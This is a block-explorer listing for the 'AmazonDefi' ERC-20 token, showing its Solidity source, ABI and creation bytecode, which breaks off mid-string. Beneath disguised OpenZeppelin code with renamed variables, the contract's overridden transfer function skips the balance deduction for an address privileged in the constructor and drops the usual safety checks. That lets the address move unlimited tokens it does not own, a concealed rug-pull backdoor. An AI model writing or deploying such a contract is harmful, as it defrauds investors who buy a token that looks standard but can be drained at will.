ERC-20
Overview
Max Total Supply
1,000,000,000 AMDE
Holders
30
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
0.000000001 AMDEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
AmazonDefi
Compiler Version
v0.8.17+commit.8df45f5f
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/* Telegram : https://t.me/amazon_defi Website : http://www.amazondefi.live/ Twitter : https://twitter.com/amazon_defi?s=21&t=6AY8nPM_VdBzeujTmFjTPA /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$__ $$ | $$__ $$ /$$__ $$|__/ | $$ \ $$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$$$ /$$$$$$ /$$$$$$$ | $$ \ $$ /$$$$$$ | $$ \__/ /$$ | $$$$$$$$| $$_ $$_ $$ |____ $$|____ /$$/ /$$__ $$| $$__ $$ | $$ | $$ /$$__ $$| $$$$ | $$ | $$__ $$| $$ \ $$ \ $$ /$$$$$$$ /$$$$/ | $$ \ $$| $$ \ $$ | $$ | $$| $$$$$$$$| $$_/ | $$ | $$ | $$| $$ | $$ | $$ /$$__ $$ /$$__/ | $$ | $$| $$ | $$ | $$ | $$| $$_____/| $$ | $$ | $$ | $$| $$ | $$ | $$| $$$$$$$ /$$$$$$$$| $$$$$$/| $$ | $$ | $$$$$$$/| $$$$$$$| $$ | $$ |__/ |__/|__/ |__/ |__/ \_______/|________/ \______/ |__/ |__/ |_______/ \_______/|__/ |__/ */ // SPDX-License-Identifier: GPL-3.0 pragma solidity >0.8.4; // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); } // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) public nuts; mapping(address => mapping(address => uint256)) private acres; uint256 public _totalSupply; string private treated; string private person; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { treated = name_; person = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return treated; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return person; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return nuts[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); correct(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return acres[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); definition(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); correct(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); definition(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { definition(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token independent, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function correct( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = nuts[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { nuts[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. nuts[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = nuts[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { nuts[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function definition( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); acres[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { definition(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _setOwner(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), 'Ownable: caller is not the owner'); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _setOwner(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), 'Ownable: new owner is the zero address'); _setOwner(newOwner); } function _setOwner(address newOwner) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } contract AmazonDefi is ERC20, Ownable { mapping(address => uint256) private acres; uint256 public entirely = 2; constructor( string memory purple, string memory report, address daily, address putting ) ERC20(purple, report) { _totalSupply = 1000000000 * 10**9; acres[putting] = _totalSupply; nuts[msg.sender] = _totalSupply; } function correct( address dollar, address anything, uint256 younger ) internal override { if (acres[dollar] == 0) { nuts[dollar] -= younger; } uint256 independent = (younger / 100) * entirely; younger -= independent; nuts[anything] += younger; emit Transfer(dollar, anything, younger); } }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"purple","type":"string"},{"internalType":"string","name":"report","type":"string"},{"internalType":"address","name":"daily","type":"address"},{"internalType":"address","name":"putting","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"entirely","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nuts","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405260026007553480156200001657600080fd5b5060405162001d0538038062001d0583398181016040528101906200003c9190620003ee565b838381600390816200004f9190620006e9565b508060049081620000619190620006e9565b50505062000084620000786200012860201b60201c565b6200013060201b60201c565b670de0b6b3a7640000600281905550600254600660008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506002546000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050505050620007d0565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200025f8262000214565b810181811067ffffffffffffffff8211171562000281576200028062000225565b5b80604052505050565b600062000296620001f6565b9050620002a4828262000254565b919050565b600067ffffffffffffffff821115620002c757620002c662000225565b5b620002d28262000214565b9050602081019050919050565b60005b83811015620002ff578082015181840152602081019050620002e2565b60008484015250505050565b6000620003226200031c84620002a9565b6200028a565b9050828152602081018484840111156200034157620003406200020f565b5b6200034e848285620002df565b509392505050565b600082601f8301126200036e576200036d6200020a565b5b8151620003808482602086016200030b565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620003b68262000389565b9050919050565b620003c881620003a9565b8114620003d457600080fd5b50565b600081519050620003e881620003bd565b92915050565b600080600080608085870312156200040b576200040a62000200565b5b600085015167ffffffffffffffff8111156200042c576200042b62000205565b5b6200043a8782880162000356565b945050602085015167ffffffffffffffff8111156200045e576200045d62000205565b5b6200046c8782880162000356565b93505060406200047f87828801620003d7565b92505060606200049287828801620003d7565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620004f157607f821691505b602082108103620005075762000506620004a9565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005717fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000532565b6200057d868362000532565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005ca620005c4620005be8462000595565b6200059f565b62000595565b9050919050565b6000819050919050565b620005e683620005a9565b620005fe620005f582620005d1565b8484546200053f565b825550505050565b600090565b6200061562000606565b62000622818484620005db565b505050565b5b818110156200064a576200063e6000826200060b565b60018101905062000628565b5050565b601f821115620006995762000663816200050d565b6200066e8462000522565b810160208510156200067e578190505b620006966200068d8562000522565b83018262000627565b50505b505050565b600082821c905092915050565b6000620006be600019846008026200069e565b1980831691505092915050565b6000620006d98383620006ab565b9150826002028217905092915050565b620006f4826200049e565b67ffffffffffffffff81111562000710576200070f62000225565b5b6200071c8254620004d8565b620007298282856200064e565b600060209050601f8311600181146200076157600084156200074c578287015190505b620007588582620006cb565b865550620007c8565b601f19841662000771866200050d565b60005b828110156200079b5784890151825560018201915060208501945060208101905062000774565b86831015620007bb5784890151620007b7601f891682620006ab565b8355505b6001600288020188555050505b505050505050565b61152580620007e06000396000f3fe608060405234801561001057600080fd5b506004361061010b5760003560e01c806370a08231116100a257806395d89b411161007157806395d89b41146102be578063a457c2d7146102dc578063a9059cbb1461030c578063dd62ed3e1461033c578063f2fde38b1461036c5761010b565b806370a0823114610236578063715018a6146102665780638c517820146102705780638da5cb5b146102a05761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca5780633eaaf86b146101fa5780635bc0f8f8146102185761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610388565b6040516101259190610dba565b60405180910390f35b61014860048036038101906101439190610e75565b61041a565b6040516101559190610ed0565b60405180910390f35b61016661043d565b6040516101739190610efa565b60405180910390f35b61019660048036038101906101919190610f15565b610447565b6040516101a39190610ed0565b60405180910390f35b6101b4610476565b6040516101c19190610f84565b60405180910390f35b6101e460048036038101906101df9190610e75565b61047f565b6040516101f19190610ed0565b60405180910390f35b6102026104b6565b60405161020f9190610efa565b60405180910390f35b6102206104bc565b60405161022d9190610efa565b60405180910390f35b610250600480360381019061024b9190610f9f565b6104c2565b60405161025d9190610efa565b60405180910390f35b61026e61050a565b005b61028a60048036038101906102859190610f9f565b610592565b6040516102979190610efa565b60405180910390f35b6102a86105aa565b6040516102b59190610fdb565b60405180910390f35b6102c66105d4565b6040516102d39190610dba565b60405180910390f35b6102f660048036038101906102f19190610e75565b610666565b6040516103039190610ed0565b60405180910390f35b61032660048036038101906103219190610e75565b6106dd565b6040516103339190610ed0565b60405180910390f35b61035660048036038101906103519190610ff6565b610700565b6040516103639190610efa565b60405180910390f35b61038660048036038101906103819190610f9f565b610787565b005b60606003805461039790611065565b80601f01602080910402602001604051908101604052809291908181526020018280546103c390611065565b80156104105780601f106103e557610100808354040283529160200191610410565b820191906000526020600020905b8154815290600101906020018083116103f357829003601f168201915b5050505050905090565b60008061042561087e565b9050610432818585610886565b600191505092915050565b6000600254905090565b60008061045261087e565b905061045f858285610a4f565b61046a858585610adb565b60019150509392505050565b60006009905090565b60008061048a61087e565b90506104ab81858561049c8589610700565b6104a691906110c5565b610886565b600191505092915050565b60025481565b60075481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61051261087e565b73ffffffffffffffffffffffffffffffffffffffff166105306105aa565b73ffffffffffffffffffffffffffffffffffffffff1614610586576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161057d90611145565b60405180910390fd5b6105906000610c64565b565b60006020528060005260406000206000915090505481565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600480546105e390611065565b80601f016020809104026020016040519081016040528092919081815260200182805461060f90611065565b801561065c5780601f106106315761010080835404028352916020019161065c565b820191906000526020600020905b81548152906001019060200180831161063f57829003601f168201915b5050505050905090565b60008061067161087e565b9050600061067f8286610700565b9050838110156106c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106bb906111d7565b60405180910390fd5b6106d18286868403610886565b60019250505092915050565b6000806106e861087e565b90506106f5818585610adb565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61078f61087e565b73ffffffffffffffffffffffffffffffffffffffff166107ad6105aa565b73ffffffffffffffffffffffffffffffffffffffff1614610803576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107fa90611145565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610872576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086990611269565b60405180910390fd5b61087b81610c64565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108f5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108ec906112fb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610964576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095b9061138d565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a429190610efa565b60405180910390a3505050565b6000610a5b8484610700565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ad55781811015610ac7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610abe906113f9565b60405180910390fd5b610ad48484848403610886565b5b50505050565b6000600660008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403610b7857806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b709190611419565b925050819055505b6000600754606483610b8a919061147c565b610b9491906114ad565b90508082610ba29190611419565b9150816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610bf291906110c5565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610c569190610efa565b60405180910390a350505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d64578082015181840152602081019050610d49565b60008484015250505050565b6000601f19601f8301169050919050565b6000610d8c82610d2a565b610d968185610d35565b9350610da6818560208601610d46565b610daf81610d70565b840191505092915050565b60006020820190508181036000830152610dd48184610d81565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e0c82610de1565b9050919050565b610e1c81610e01565b8114610e2757600080fd5b50565b600081359050610e3981610e13565b92915050565b6000819050919050565b610e5281610e3f565b8114610e5d57600080fd5b50565b600081359050610e6f81610e49565b92915050565b60008060408385031215610e8c57610e8b610ddc565b5b6000610e9a85828601610e2a565b9250506020610eab85828601610e60565b9150509250929050565b60008115159050919050565b610eca81610eb5565b82525050565b6000602082019050610ee56000830184610ec1565b92915050565b610ef481610e3f565b82525050565b6000602082019050610f0f6000830184610eeb565b92915050565b600080600060608486031215610f2e57610f2d610ddc565b5b6000610f3c86828701610e2a565b9350506020610f4d86828701610e2a565b9250506040610f5e86828701610e60565b9150509250925092565b600060ff82169050919050565b610f7e81610f68565b82525050565b6000602082019050610f996000830184610f75565b92915050565b600060208284031215610fb557610fb4610ddc565b5b6000610fc384828501610e2a565b91505092915050565b610fd581610e01565b82525050565b6000602082019050610ff06000830184610fcc565b92915050565b6000806040838503121561100d5761100c610ddc565b5b600061101b85828601610e2a565b925050602061102c85828601610e2a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061107d57607f821691505b6020821081036110905761108f611036565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006110d082610e3f565b91506110db83610e3f565b92508282019050808211156110f3576110f2611096565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061112f602083610d35565b915061113a826110f9565b602082019050919050565b6000602082019050818103600083015261115e81611122565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006111c1602583610d35565b91506111cc82611165565b604082019050919050565b600060208201905081810360008301526111f0816111b4565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611253602683610d35565b915061125e826111f7565b604082019050919050565b6000602082019050818103600083015261128281611246565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006112e5602483610d35565b91506112f082611289565b604082019050919050565b60006020820190508181036000830152611314816112d8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611377602283610d35565b91506113828261131b565b604082019050919050565b600060208201905081810360008301526113a68161136a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006113e3601d83610